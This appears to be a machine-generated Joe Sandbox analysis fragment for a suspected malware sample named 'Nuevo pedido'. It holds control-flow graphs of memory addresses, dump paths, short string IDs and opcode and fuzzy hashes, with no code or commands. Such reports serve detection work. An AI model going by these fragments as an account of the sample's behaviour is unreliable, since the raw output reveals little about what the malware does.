                                                                                                                                            control_flow_graph 259 2f77118-2f7713b 260 2f77146-2f77166 259->260 261 2f7713d-2f77143 259->261 264 2f7716d-2f77174 260->264 265 2f77168 260->265 261->260 267 2f77176-2f77181 264->267 266 2f774fc-2f77505 265->266 268 2f77187-2f7719a 267->268 269 2f7750d 267->269 272 2f771b0-2f771cb 268->272 273 2f7719c-2f771aa 268->273 271 2f77512-2f77519 269->271 271->271 274 2f7751a-2f77521 271->274 280 2f771ef-2f771f2 272->280 281 2f771cd-2f771d3 272->281 273->272 278 2f77484-2f7748b 273->278 274->274 275 2f77523-2f77549 274->275 284 2f77552-2f77556 275->284 285 2f7754b-2f77550 275->285 278->266 288 2f7748d-2f7748f 278->288 282 2f7734c-2f77352 280->282 283 2f771f8-2f771fb 280->283 286 2f771d5 281->286 287 2f771dc-2f771df 281->287 289 2f7743e-2f77441 282->289 290 2f77358-2f7735d 282->290 283->282 291 2f77201-2f77207 283->291 292 2f7755c-2f7755d 284->292 285->292 286->282 286->287 286->289 293 2f77212-2f77218 286->293 287->293 294 2f771e1-2f771e4 287->294 295 2f77491-2f77496 288->295 296 2f7749e-2f774a4 288->296 301 2f77447-2f7744d 289->301 302 2f77508 289->302 290->289 291->282 300 2f7720d 291->300 303 2f7721e-2f77220 293->303 304 2f7721a-2f7721c 293->304 297 2f7727e-2f77284 294->297 298 2f771ea 294->298 295->296 296->269 299 2f774a6-2f774ab 296->299 297->289 307 2f7728a-2f77290 297->307 298->289 305 2f774f0-2f774f3 299->305 306 2f774ad-2f774b2 299->306 300->289 308 2f77472-2f77476 301->308 309 2f7744f-2f77457 301->309 302->269 310 2f7722a-2f77233 303->310 304->310 305->302 311 2f774f5-2f774fa 305->311 306->302 312 2f774b4 306->312 313 2f77296-2f77298 307->313 314 2f77292-2f77294 307->314 308->278 318 2f77478-2f7747e 308->318 309->269 315 2f7745d-2f7746c 309->315 316 2f77246-2f7726e 310->316 317 2f77235-2f77240 310->317 311->266 311->288 319 2f774bb-2f774c0 312->319 320 2f772a2-2f772b9 313->320 314->320 315->272 315->308 338 2f77274-2f77279 316->338 339 2f77362-2f77398 316->339 317->289 317->316 318->267 318->278 321 2f774e2-2f774e4 319->321 322 2f774c2-2f774c4 319->322 332 2f772e4-2f7730b 320->332 333 2f772bb-2f772d4 320->333 321->302 329 2f774e6-2f774e9 321->329 326 2f774c6-2f774cb 322->326 327 2f774d3-2f774d9 322->327 326->327 327->269 331 2f774db-2f774e0 327->331 329->305 331->321 334 2f774b6-2f774b9 331->334 332->302 344 2f77311-2f77314 332->344 333->339 342 2f772da-2f772df 333->342 334->302 334->319 338->339 345 2f773a5-2f773ad 339->345 346 2f7739a-2f7739e 339->346 342->339 344->302 347 2f7731a-2f77343 344->347 345->302 350 2f773b3-2f773b8 345->350 348 2f773a0-2f773a3 346->348 349 2f773bd-2f773c1 346->349 347->339 362 2f77345-2f7734a 347->362 348->345 348->349 351 2f773c3-2f773c9 349->351 352 2f773e0-2f773e4 349->352 350->289 351->352 354 2f773cb-2f773d3 351->354 355 2f773e6-2f773ec 352->355 356 2f773ee-2f7740d call 2f776f1 352->356 354->302 358 2f773d9-2f773de 354->358 355->356 357 2f77413-2f77417 355->357 356->357 357->289 360 2f77419-2f77435 357->360 358->289 360->289 362->339
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                            • API String ID: 0-2525668591
                                                                                                                                            • Opcode ID: 1d7fbef498cc791d5b7f2be465757492fa678e08c924b32b8566d2ea9ccc2933
                                                                                                                                            • Instruction ID: 9a557fe7ba8c01c8a08ae4a87e96faee267f4c939931a2ede4ee6bf83e496eca
                                                                                                                                            • Opcode Fuzzy Hash: 1d7fbef498cc791d5b7f2be465757492fa678e08c924b32b8566d2ea9ccc2933
                                                                                                                                            • Instruction Fuzzy Hash: BDE13831E10109DFCB15EFA9D984AADFBB2BF88384F15846AE915EB365D730E841CB50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 364 2f729ec-2f729f6 366 2f72981-2f72999 364->366 367 2f729f8-2f72a3b 364->367 370 2f729a0-2f729c8 366->370 373 2f72a5d-2f72aac 367->373 374 2f72a3d-2f72a5c 367->374 378 2f72ac7-2f72acf 373->378 379 2f72aae-2f72ab5 373->379 382 2f72ad2-2f72ae6 378->382 380 2f72ab7-2f72abc 379->380 381 2f72abe-2f72ac5 379->381 380->382 381->382 385 2f72afc-2f72b04 382->385 386 2f72ae8-2f72aef 382->386 389 2f72b06-2f72b0a 385->389 387 2f72af5-2f72afa 386->387 388 2f72af1-2f72af3 386->388 387->389 388->389 391 2f72b0c-2f72b21 389->391 392 2f72b6a-2f72b6d 389->392 391->392 398 2f72b23-2f72b26 391->398 393 2f72bb5-2f72bbb 392->393 394 2f72b6f-2f72b84 392->394 395 2f736b6 393->395 396 2f72bc1-2f72bc3 393->396 394->393 406 2f72b86-2f72b8a 394->406 403 2f736bb-2f736f0 395->403 396->395 399 2f72bc9-2f72bce 396->399 401 2f72b45-2f72b63 call 2f702c8 398->401 402 2f72b28-2f72b2a 398->402 404 2f73664-2f73668 399->404 405 2f72bd4 399->405 401->392 402->401 409 2f72b2c-2f72b2f 402->409 424 2f736f2-2f7371a 403->424 425 2f7371f-2f73878 403->425 411 2f7366f-2f736b5 404->411 412 2f7366a-2f7366d 404->412 405->404 407 2f72b92-2f72bb0 call 2f702c8 406->407 408 2f72b8c-2f72b90 406->408 407->393 408->393 408->407 409->392 414 2f72b31-2f72b43 409->414 412->403 412->411 414->392 414->401 424->425 426 2f738aa-2f738bc 425->426 427 2f7387a-2f738a6 425->427 428 2f738ee-2f738f4 426->428 429 2f738be-2f738c4 426->429 427->426 433 2f738f6-2f7390c 428->433 434 2f73928-2f7393b 428->434 429->433 438 2f738c5-2f738e8 429->438 436 2f7393e-2f739e6 433->436 437 2f7390e-2f73927 433->437 434->436 437->434 438->428
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                            • API String ID: 0-2732225958
                                                                                                                                            • Opcode ID: 39a99bec66c62ef22a3c78d9870f5a8b739459c66011ebedb0738e17820148fd
                                                                                                                                            • Instruction ID: 4ac6fd40430633dadf2804740c97a4052aa2eaf3f3b0984cf1040dcde38d69e3
                                                                                                                                            • Opcode Fuzzy Hash: 39a99bec66c62ef22a3c78d9870f5a8b739459c66011ebedb0738e17820148fd
                                                                                                                                            • Instruction Fuzzy Hash: 22E1F332F04395DFDB124F388A6579BBBF2EF9A684F0804EADE4156602E7354492EF41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$4'^q
                                                                                                                                            • API String ID: 0-273632683
                                                                                                                                            • Opcode ID: 5b540f2d6aafa58472c8c965fac62081f8758acef27c28f3c37323bb805a403d
                                                                                                                                            • Instruction ID: 1d4600812af7f6e8fa833e91537cd0cd8fd80c60a69d37e74d87188a38195e08
                                                                                                                                            • Opcode Fuzzy Hash: 5b540f2d6aafa58472c8c965fac62081f8758acef27c28f3c37323bb805a403d
                                                                                                                                            • Instruction Fuzzy Hash: E0825E31A00209DFCB15CFA8C584AAEBBB2FF88394F16856AE5059B365D731ED91CB50

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1029 2f769a0-2f769e6 1030 2f76fb1-2f7700c call 2f77118 1029->1030 1031 2f769ec-2f769fa 1029->1031 1049 2f7700e-2f77012 1030->1049 1050 2f7705c-2f77060 1030->1050 1034 2f769fc-2f76a0d 1031->1034 1035 2f76a28-2f76a39 1031->1035 1034->1035 1043 2f76a0f-2f76a1b 1034->1043 1037 2f76a3b-2f76a3f 1035->1037 1038 2f76aaa-2f76abe 1035->1038 1040 2f76a41-2f76a4d 1037->1040 1041 2f76a5a-2f76a63 1037->1041 1176 2f76ac1 call 2f769a0 1038->1176 1177 2f76ac1 call 2f76fc8 1038->1177 1045 2f76a53-2f76a55 1040->1045 1046 2f76ddb-2f76e26 1040->1046 1047 2f76d6c 1041->1047 1048 2f76a69-2f76a6c 1041->1048 1051 2f76d71-2f76dd4 1043->1051 1052 2f76a21-2f76a23 1043->1052 1044 2f76ac7-2f76acd 1053 2f76ad6-2f76add 1044->1053 1054 2f76acf-2f76ad1 1044->1054 1055 2f76d62-2f76d69 1045->1055 1126 2f76e2d-2f76eac 1046->1126 1047->1051 1048->1047 1056 2f76a72-2f76a91 1048->1056 1059 2f77014-2f77019 1049->1059 1060 2f77021-2f77028 1049->1060 1057 2f77077-2f7708b 1050->1057 1058 2f77062-2f77071 1050->1058 1051->1046 1052->1055 1063 2f76ae3-2f76afa 1053->1063 1064 2f76bcb-2f76bdc 1053->1064 1054->1055 1056->1047 1088 2f76a97-2f76a9d 1056->1088 1068 2f77093-2f7709a 1057->1068 1172 2f7708d call 2f79dd0 1057->1172 1173 2f7708d call 2f7a0e8 1057->1173 1174 2f7708d call 2f7a088 1057->1174 1065 2f77073-2f77075 1058->1065 1066 2f7709d-2f770a7 1058->1066 1059->1060 1061 2f770fe-2f77113 1060->1061 1062 2f7702e-2f77035 1060->1062 1062->1050 1069 2f77037-2f7703b 1062->1069 1063->1064 1086 2f76b00-2f76b0c 1063->1086 1083 2f76c06-2f76c0c 1064->1083 1084 2f76bde-2f76beb 1064->1084 1065->1068 1070 2f770b1-2f770b5 1066->1070 1071 2f770a9-2f770af 1066->1071 1076 2f7703d-2f77042 1069->1076 1077 2f7704a-2f77051 1069->1077 1079 2f770bd-2f770f7 1070->1079 1080 2f770b7 1070->1080 1071->1079 1076->1077 1077->1061 1085 2f77057-2f7705a 1077->1085 1079->1061 1080->1079 1090 2f76c27-2f76c2d 1083->1090 1091 2f76c0e-2f76c1a 1083->1091 1084->1090 1102 2f76bed-2f76bf9 1084->1102 1085->1068 1093 2f76bc4-2f76bc6 1086->1093 1094 2f76b12-2f76b7e 1086->1094 1088->1030 1096 2f76aa3-2f76aa7 1088->1096 1100 2f76c33-2f76c50 1090->1100 1101 2f76d5f 1090->1101 1098 2f76ec3-2f76f26 1091->1098 1099 2f76c20-2f76c22 1091->1099 1093->1055 1129 2f76b80-2f76baa 1094->1129 1130 2f76bac-2f76bc1 1094->1130 1096->1038 1152 2f76f2d-2f76fac 1098->1152 1099->1055 1100->1047 1121 2f76c56-2f76c59 1100->1121 1101->1055 1108 2f76eb1-2f76ebc 1102->1108 1109 2f76bff-2f76c01 1102->1109 1108->1098 1109->1055 1121->1030 1122 2f76c5f-2f76c85 1121->1122 1122->1101 1133 2f76c8b-2f76c97 1122->1133 1129->1130 1130->1093 1136 2f76c9d-2f76d15 1133->1136 1137 2f76d5b-2f76d5d 1133->1137 1155 2f76d17-2f76d41 1136->1155 1156 2f76d43-2f76d58 1136->1156 1137->1055 1155->1156 1156->1137 1172->1068 1173->1068 1174->1068 1176->1044 1177->1044
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (o^q$Hbq
                                                                                                                                            • API String ID: 0-662517225
                                                                                                                                            • Opcode ID: e216f865fe3642d3ff541250aef993e0c9bfe820317f36b77a0153c6c1a83c6d
                                                                                                                                            • Instruction ID: 7fda1c49ea19af95f832392cdf0b436872aa80d58aab02c702470de0b143940e
                                                                                                                                            • Opcode Fuzzy Hash: e216f865fe3642d3ff541250aef993e0c9bfe820317f36b77a0153c6c1a83c6d
                                                                                                                                            • Instruction Fuzzy Hash: 08127C71A006198FDB14DF69C854BAEBBF6BF88744F14856AE906EB390DF309D41CB90

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1449 2f7c146-2f7c158 1450 2f7c184 1449->1450 1451 2f7c15a-2f7c172 1449->1451 1452 2f7c186-2f7c18a 1450->1452 1455 2f7c174-2f7c179 1451->1455 1456 2f7c17b-2f7c17e 1451->1456 1455->1452 1457 2f7c180-2f7c182 1456->1457 1458 2f7c18b-2f7c199 1456->1458 1457->1450 1457->1451 1460 2f7c19b-2f7c1a1 1458->1460 1461 2f7c1f9-2f7c1fc 1458->1461 1462 2f7c1a3-2f7c1c8 1460->1462 1463 2f7c201-2f7c2ac call 2f741a0 call 2f73cc0 1460->1463 1461->1463 1464 2f7c1cf-2f7c1f7 1462->1464 1465 2f7c1ca 1462->1465 1475 2f7c2b3-2f7c2d4 call 2f75658 1463->1475 1476 2f7c2ae 1463->1476 1464->1461 1465->1464 1478 2f7c2d9-2f7c2e4 1475->1478 1476->1475 1479 2f7c2e6 1478->1479 1480 2f7c2eb-2f7c2ef 1478->1480 1479->1480 1481 2f7c2f4-2f7c2fb 1480->1481 1482 2f7c2f1-2f7c2f2 1480->1482 1484 2f7c302-2f7c310 1481->1484 1485 2f7c2fd 1481->1485 1483 2f7c313-2f7c357 1482->1483 1489 2f7c3bd-2f7c3d4 1483->1489 1484->1483 1485->1484 1491 2f7c3d6-2f7c3fb 1489->1491 1492 2f7c359-2f7c36f 1489->1492 1499 2f7c413 1491->1499 1500 2f7c3fd-2f7c412 1491->1500 1496 2f7c371-2f7c37d 1492->1496 1497 2f7c399 1492->1497 1501 2f7c387-2f7c38d 1496->1501 1502 2f7c37f-2f7c385 1496->1502 1498 2f7c39f-2f7c3bc 1497->1498 1498->1489 1500->1499 1503 2f7c397 1501->1503 1502->1503 1503->1498
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 5fa3b7055297e448fccf69bd386b68a9d0e4eae1fde1aaeacdb3b48fdc208b88
                                                                                                                                            • Instruction ID: 8cc644bd6f56807efac4dabe28b2d45a4a031232ad478b96ddb6e683d94a0354
                                                                                                                                            • Opcode Fuzzy Hash: 5fa3b7055297e448fccf69bd386b68a9d0e4eae1fde1aaeacdb3b48fdc208b88
                                                                                                                                            • Instruction Fuzzy Hash: 22A1D475E00218CFDB54DFAAD884A9DBBF2FF89350F14806AE509AB361DB719885CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 19359de88fb9a50ea74360ce5d93aa0ec7fe5a611f6fbb25725693ded5e32a60
                                                                                                                                            • Instruction ID: da7a67e76d2db359f14871a59e618fe9680b001978f162d96b9dad2823b3670e
                                                                                                                                            • Opcode Fuzzy Hash: 19359de88fb9a50ea74360ce5d93aa0ec7fe5a611f6fbb25725693ded5e32a60
                                                                                                                                            • Instruction Fuzzy Hash: F681B374E00218CFDB54CFAAD994A9DBBF2BF88300F14C06AE519AB365DB309985CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 9b03105f978020f739b637e2b6a5d5e58a33cb13c58a6ce1270af1bea3c7ee20
                                                                                                                                            • Instruction ID: e45a4974edbd69ab14d8a119f546646532218a36407a3d0552824cd5ca61202d
                                                                                                                                            • Opcode Fuzzy Hash: 9b03105f978020f739b637e2b6a5d5e58a33cb13c58a6ce1270af1bea3c7ee20
                                                                                                                                            • Instruction Fuzzy Hash: 0381B774E00218CFDB58DFAAD984A9DBBF2BF89300F54C06AD509AB365DB349985CF10
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 659085e1fa97b91b2f9a7af75b3478fecf0cc9e6d94c927ee89c115d1fea0497
                                                                                                                                            • Instruction ID: 7f70503a1b9d452813718bacfe07fb65f1392e52879bbe32dfec222339a16174
                                                                                                                                            • Opcode Fuzzy Hash: 659085e1fa97b91b2f9a7af75b3478fecf0cc9e6d94c927ee89c115d1fea0497
                                                                                                                                            • Instruction Fuzzy Hash: 3B81A674E00218CFDB54DFAAD984A9DBBF2BF88304F54C06AD909AB365DB349985CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 6304fe7a9fbb429b1ab84ebe742995f73507c71b5e46b33e5f2f48f10747442e
                                                                                                                                            • Instruction ID: 42a585cbe477bc9305d69a0f520e808b6dabea3ed90a11c8c7bde9cf7c77c385
                                                                                                                                            • Opcode Fuzzy Hash: 6304fe7a9fbb429b1ab84ebe742995f73507c71b5e46b33e5f2f48f10747442e
                                                                                                                                            • Instruction Fuzzy Hash: 0081A574E00258CFDB14DFAAD984A9DBBF2BF88300F14D06AE519AB365DB349985CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: ac79489045f4d93efa26bcff0f1f7d339de4a2d22f76d79b4f40cc4c978788bd
                                                                                                                                            • Instruction ID: bb05f758251f0674754f44b1b42b80e98192cb404f363178d278e33fbc456a67
                                                                                                                                            • Opcode Fuzzy Hash: ac79489045f4d93efa26bcff0f1f7d339de4a2d22f76d79b4f40cc4c978788bd
                                                                                                                                            • Instruction Fuzzy Hash: B581A974E00218CFEB14DFAAD984A9DBBF2BF88300F54D06AD519AB365DB709985CF10
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: e5910bcbdbf8c6f43ea6b26879cee3bc084b403e2edf0d55e32dd06fdc3fa20c
                                                                                                                                            • Instruction ID: d16787ca62d21c3a6874e50f13a2859d51e33d64e96dc6f4838505cb0d5f6bc0
                                                                                                                                            • Opcode Fuzzy Hash: e5910bcbdbf8c6f43ea6b26879cee3bc084b403e2edf0d55e32dd06fdc3fa20c
                                                                                                                                            • Instruction Fuzzy Hash: 6C819474E00218CFDB54DFAAD984A9DBBF2BF88300F14C06AE519AB365DB349985CF50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: PH^q$PH^q
                                                                                                                                            • API String ID: 0-1598597984
                                                                                                                                            • Opcode ID: 0e65cdd1219aeb6c7559752203e59e84690a771bc2172413fd14eefcd84a6632
                                                                                                                                            • Instruction ID: 676dc0ed0977ea152f92054c2090246793c1c6fd7c190c89bba6a6df148881df
                                                                                                                                            • Opcode Fuzzy Hash: 0e65cdd1219aeb6c7559752203e59e84690a771bc2172413fd14eefcd84a6632
                                                                                                                                            • Instruction Fuzzy Hash: 2F51A374E002188FDB18DFAAD984A9DBBF2BF88300F14D06AD518AB365DB749985CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d95862ee4cbc3f62465075ef102311514a33b6bc1ad9793108a2eee2af2f70e4
                                                                                                                                            • Instruction ID: a89ebacc7cb62eed6d7bc46847b8d24edc0bb9883754109c99df622726115571
                                                                                                                                            • Opcode Fuzzy Hash: d95862ee4cbc3f62465075ef102311514a33b6bc1ad9793108a2eee2af2f70e4
                                                                                                                                            • Instruction Fuzzy Hash: 1FE1F074D01219CFDB64CFB5D858BADBBB2FF89305F1085AAD40AA7250DB749A85CF10
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a10f5a568df3d9c9f6dcef7dedb57390083c363231856e325a60e928ca17877
                                                                                                                                            • Instruction ID: 62c6184ea4e3ff910b5dfa1cc0a8fdbfba7dcff3299860031f488063a3c1beb3
                                                                                                                                            • Opcode Fuzzy Hash: 7a10f5a568df3d9c9f6dcef7dedb57390083c363231856e325a60e928ca17877
                                                                                                                                            • Instruction Fuzzy Hash: 9D51C675E00208DFDB18DFAAD984A9DBBB2FF88300F14C16AE915AB364DB319845CF54
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0d00cf272411e34e782b6b2f84e4400ce69307521724f84de2fee81649da7379
                                                                                                                                            • Instruction ID: af87777d91671020b62ab805e50797399d8e29c0029c22f838014755150905f9
                                                                                                                                            • Opcode Fuzzy Hash: 0d00cf272411e34e782b6b2f84e4400ce69307521724f84de2fee81649da7379
                                                                                                                                            • Instruction Fuzzy Hash: B651A774E00208DFDB18DFAAD584A9DBBF2FF88300F20856AE915AB364DB319945CF54

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 2f776f1-2f77725 1 2f77b54-2f77b58 0->1 2 2f7772b-2f7774e 0->2 3 2f77b71-2f77b7f 1->3 4 2f77b5a-2f77b6e 1->4 11 2f77754-2f77761 2->11 12 2f777fc-2f77800 2->12 9 2f77b81-2f77b96 3->9 10 2f77bf0-2f77c05 3->10 20 2f77b9d-2f77baa 9->20 21 2f77b98-2f77b9b 9->21 22 2f77c07-2f77c0a 10->22 23 2f77c0c-2f77c19 10->23 28 2f77763-2f7776e 11->28 29 2f77770 11->29 13 2f77802-2f77810 12->13 14 2f77848-2f77851 12->14 13->14 36 2f77812-2f7782d 13->36 17 2f77c67 14->17 18 2f77857-2f77861 14->18 30 2f77c6c-2f77c9c 17->30 18->1 26 2f77867-2f77870 18->26 24 2f77bac-2f77bed 20->24 21->24 25 2f77c1b-2f77c56 22->25 23->25 78 2f77c5d-2f77c64 25->78 34 2f77872-2f77877 26->34 35 2f7787f-2f7788b 26->35 31 2f77772-2f77774 28->31 29->31 63 2f77cb5-2f77cbc 30->63 64 2f77c9e-2f77cb4 30->64 31->12 37 2f7777a-2f777dc 31->37 34->35 35->30 40 2f77891-2f77897 35->40 59 2f7782f-2f77839 36->59 60 2f7783b 36->60 89 2f777e2-2f777f9 37->89 90 2f777de 37->90 43 2f77b3e-2f77b42 40->43 44 2f7789d-2f778ad 40->44 43->17 48 2f77b48-2f77b4e 43->48 57 2f778c1-2f778c3 44->57 58 2f778af-2f778bf 44->58 48->1 48->26 61 2f778c6-2f778cc 57->61 58->61 62 2f7783d-2f7783f 59->62 60->62 61->43 65 2f778d2-2f778e1 61->65 62->14 66 2f77841 62->66 72 2f778e7 65->72 73 2f7798f-2f779ba call 2f77538 * 2 65->73 66->14 76 2f778ea-2f778fb 72->76 91 2f77aa4-2f77abe 73->91 92 2f779c0-2f779c4 73->92 76->30 80 2f77901-2f77913 76->80 80->30 82 2f77919-2f77931 80->82 145 2f77933 call 2f78065 82->145 146 2f77933 call 2f780c9 82->146 147 2f77933 call 2f780d8 82->147 85 2f77939-2f77949 85->43 88 2f7794f-2f77952 85->88 93 2f77954-2f7795a 88->93 94 2f7795c-2f7795f 88->94 89->12 90->89 91->1 114 2f77ac4-2f77ac8 91->114 92->43 96 2f779ca-2f779ce 92->96 93->94 97 2f77965-2f77968 93->97 94->17 94->97 99 2f779f6-2f779fc 96->99 100 2f779d0-2f779dd 96->100 101 2f77970-2f77973 97->101 102 2f7796a-2f7796e 97->102 103 2f77a37-2f77a3d 99->103 104 2f779fe-2f77a02 99->104 117 2f779df-2f779ea 100->117 118 2f779ec 100->118 101->17 105 2f77979-2f7797d 101->105 102->101 102->105 107 2f77a3f-2f77a43 103->107 108 2f77a49-2f77a4f 103->108 104->103 106 2f77a04-2f77a0d 104->106 105->17 111 2f77983-2f77989 105->111 112 2f77a0f-2f77a14 106->112 113 2f77a1c-2f77a32 106->113 107->78 107->108 115 2f77a51-2f77a55 108->115 116 2f77a5b-2f77a5d 108->116 111->73 111->76 112->113 113->43 120 2f77b04-2f77b08 114->120 121 2f77aca-2f77ad4 call 2f763e0 114->121 115->43 115->116 122 2f77a92-2f77a94 116->122 123 2f77a5f-2f77a68 116->123 119 2f779ee-2f779f0 117->119 118->119 119->43 119->99 120->78 126 2f77b0e-2f77b12 120->126 121->120 134 2f77ad6-2f77aeb 121->134 122->43 124 2f77a9a-2f77aa1 122->124 129 2f77a77-2f77a8d 123->129 130 2f77a6a-2f77a6f 123->130 126->78 131 2f77b18-2f77b25 126->131 129->43 130->129 137 2f77b27-2f77b32 131->137 138 2f77b34 131->138 134->120 142 2f77aed-2f77b02 134->142 139 2f77b36-2f77b38 137->139 138->139 139->43 